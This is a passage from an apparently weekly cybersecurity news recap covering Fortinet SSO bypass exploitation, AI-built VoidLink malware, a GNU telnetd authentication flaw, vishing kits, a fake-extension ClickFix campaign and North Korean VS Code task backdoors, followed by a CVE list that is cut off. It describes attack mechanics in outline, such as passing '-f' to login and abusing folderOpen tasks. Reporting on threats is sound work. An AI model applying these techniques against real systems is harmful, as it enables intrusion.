⚡ Weekly Recap: Firewall Flaws, AI-Built Malware, Browser Traps, Critical CVEs & More  Ravie Lakshmanan  Jan 26, 2026 Hacking News / Cybersecurity Security failures rarely arrive loudly. They slip in through trusted tools, half-fixed problems, and habits people stop questioning. This week’s recap shows that pattern clearly. Attackers are moving faster than defenses, mixing old tricks with new paths. “Patched” no longer means safe, and every day, software keeps becoming the entry point. What follows is a set of small but telling signals. Short updates that, together, show how quickly risk is shifting and why details can’t be ignored. ⚡ Threat of the Week Improperly Patched Flaw Exploited Again in Fortinet Firewalls — Fortinet confirmed that it's working to completely plug a FortiCloud SSO authentication bypass vulnerability following reports of fresh exploitation activity on fully-patched firewalls. "We have identified a number of cases where the exploit was to a device that had been fully upgraded to the latest release at the time of the attack, which suggested a new attack path," the company said. The activity has been found to exploit an incomplete patch for CVE-2025-59718 and CVE-2025-59719, which could allow unauthenticated bypass of SSO login authentication via crafted SAML messages if the FortiCloud SSO feature is enabled on affected devices. In the absence of a fix, users are advised to restrict administrative access of edge network devices and turn off FortiCloud SSO logins by disabling the "admin-forticloud-sso-login" setting. When Your CEO Calls, Will You Know It's Real? Keeper Security is officially FedRAMP High Authorized, meeting the highest standards for federal cybersecurity. Powered by zero-trust architecture and zero-knowledge encryption, KeeperPAM is built to protect mission-critical data and infrastructure. Book a demo to see KeeperPAM in action. Learn More ➝ 🔔 Top News TikTok Forms New U.S. Entity to Avoid Federal Ban — TikTok officially announced that it formed a joint venture that will allow the hugely popular video-sharing application to continue operating in the U.S. The new venture, named TikTok USDS Joint Venture LLC, has been established in compliance with the Executive Order signed by U.S. President Donald Trump in September 2025, the platform said. The new deal will see TikTok's Chinese parent company, ByteDance, selling the majority of its stake to a group of majority-American investors, while it will retain a 19.9% stake in the business. The Chinese government hasn't commented publicly on the agreement. The deal ends years of regulatory uncertainty that began in August 2020, when President Trump announced plans to ban the app, citing national security concerns. VoidLink Generated Almost Entirely Using AI — VoidLink, the recently discovered Linux malware which targets Linux-based cloud servers, was likely generated almost entirely by artificial intelligence (AI), signaling a significant evolution in the use of the technology to develop advanced malware. What was significant in alerting researchers to AI involvement in building VoidLink was a development plan that accompanied the project and was accidentally left exposed by its author. The developer also utilized regular checkpoints to ensure that the model was developing as instructed and that the code worked. The result was a malware which the researchers who first detailed VoidLink described as "sophisticated, modern and feature-rich." The discovery is a watershed moment for malware development, underscoring a shift in how AI can be used to design advanced malicious programs. "The security community has long anticipated that AI would be a force multiplier for malicious actors. Until now, however, the clearest evidence of AI-driven activity has largely surfaced in lower-sophistication operations, often tied to less experienced threat actors, and has not meaningfully raised the risk beyond regular attacks," Check Point said. "VoidLink shifts that baseline: its level of sophistication shows that when AI is in the hands of capable developers, it can materially amplify both the speed and the scale at which serious offensive capability can be produced." From a defensive point of view, the use of AI also complicates attribution, as the generated code removes a lot of usual clues and makes it harder to determine who's really behind an attack. Critical GNU InetUtils telnetd Flaw Detailed — A critical security flaw has been disclosed in the GNU InetUtils telnet daemon (telnetd) that went unnoticed for nearly 11 years. The vulnerability, tracked as CVE-2026-24061 (CVSS score: 9.8), affects all versions of GNU InetUtils from version 1.9.3 up to and including version 2.7. The vulnerability was introduced as part of a code change in March 2015. The flaw allows an attacker to establish a Telnet session without providing valid credentials, granting unauthorized access to the target system. SafeBreach Labs, in a root cause analysis of CVE-2026-24061, described it as easy to exploit and that an attacker can supply a "-f" flag for the "/usr/bin/login" executable, effectively skipping the interactive authentication and giving them a root shell. It has also released a public proof-of-concept (PoC) exploit for the flaw. Vishing Attacks Target Identity Providers — Threat actors who specialize in voice phishing (aka vishing) have started using bespoke phishing kits that can intercept targets' login credentials while also allowing attackers to control the authentication flow in a targeted user's browser in real-time. "Where threat actors could once pay for access to a kit with basic features that targeted all popular Identity Providers (Google, Microsoft Entra, Okta, etc.) and cryptocurrency platforms, a new generation of fraudsters are attempting to sell access to bespoke panels for each targeted service," Okta said. The ShinyHunters extortion gang has claimed responsibility for some of the attacks, Bleeping Computer reported . CrashFix Crashes Browsers to Deliver Malware — A malvertising campaign is using a fake ad-blocking Chrome and Edge extension named NexShield that intentionally crashes the browser as a precursor to ClickFix attacks. Unlike typical ClickFix schemes that use non-existent security alerts or CAPTCHAs to lure users into executing malicious commands, the new CrashFix variant leverages a malicious extension that first intentionally crashes the victim's browser and then delivers a fraudulent fix. When the browser is restarted, the extension displays a deceptive pop-up that shows a fake warning and suggests scanning the system to identify the problem. Doing so opens a new window with a bogus warning about detected security issues, along with instructions on how to fix the problem, which involve executing malicious commands in the Windows Run prompt, in a typical ClickFix fashion. While the extension has since been removed, the attacks are designed to deliver a new Python-based remote access tool called ModeloRAT. The findings show that browser extensions are a high-risk attack vector for enterprises, allowing threat actors to bypass traditional security controls and gain a foothold on corporate endpoints. Contagious Interview Evolves to Deliver Backdoor via VS Code — The North Korean threat actors behind the Contagious Interview campaign are employing a new mechanism that uses Microsoft Visual Studio Code (VS Code) to deliver a previously unseen backdoor that enables remote code execution on developer systems. The attack chain starts when targets are asked to clone and open malicious repositories hosted on GitHub, GitLab, or Bitbucket, typically framed as part of a technical assignment or code review exercise related to the hiring process. "The most important facilitator for this attack vector is the configuration's runOptions property, which supports a runOn value of folderOpen, causing the defined task to execute automatically when a workspace is opened," Abstract Security said . "Contagious Interview actors exploit this by including malicious shell commands in tasks.json files. When a victim clones a repository to their local machine and opens it in VS Code, the malicious task executes and kicks off the infection chain leading to malware installation." The malicious payloads are mostly hosted on Vercel domains, but other domains like vscodeconfig[.]com and vscode-load.onrender[.]com have also been identified. In at least one case, the "tasks.json" file is used to install a malicious npm package named " jsonwebauth ." Contagious Interview has been active since 2022, primarily targeting software developers and IT professionals, especially in the blockchain and cryptocurrency sectors. As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified between August 2024 and September 2025, most of which are concentrated around South Asia and North America. ‎️‍🔥 Trending CVEs Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2026-24061 (GNU InetUtils telnetd), CVE-2026-23760 (SmarterMail), CVE-2026-20045 (Cisco Unified Communications and Webex Calling Dedicated Instance), CVE-2026-22218, CVE-2026-22219 (Chainlit), CVE-2026-1245 (binary-parser), CVE-2025-68143, CVE-2025-68144, CVE-2025-68145 (Anthropic mcp-server-git), CVE-2026-22844 (Zoom), CVE-2025-13927, CVE-2025-13928, CVE-2026-0723 (GitLab CE/EE), CVE-2026-0629 (TP-Link), CVE-2025-49758 (Microsoft SQL Server), CVE-2025-47179 (Microsoft Configuration Manager), CVE-2025-60021 (Apache bRPC), CVE-2025-61937, CVE-2025-64691, CVE-2025-61943, CVE-2025-65118 (AVEVA Process Optimization), CVE-2025-14369 (dr_flac), CVE-2026-0828 (Safetica ProcessMonitorDriver.sys), CVE-2026-0685 (Genshi template engine), CVE-2025-68675 (Apache Airflow), CVE-2025-14533 (Ad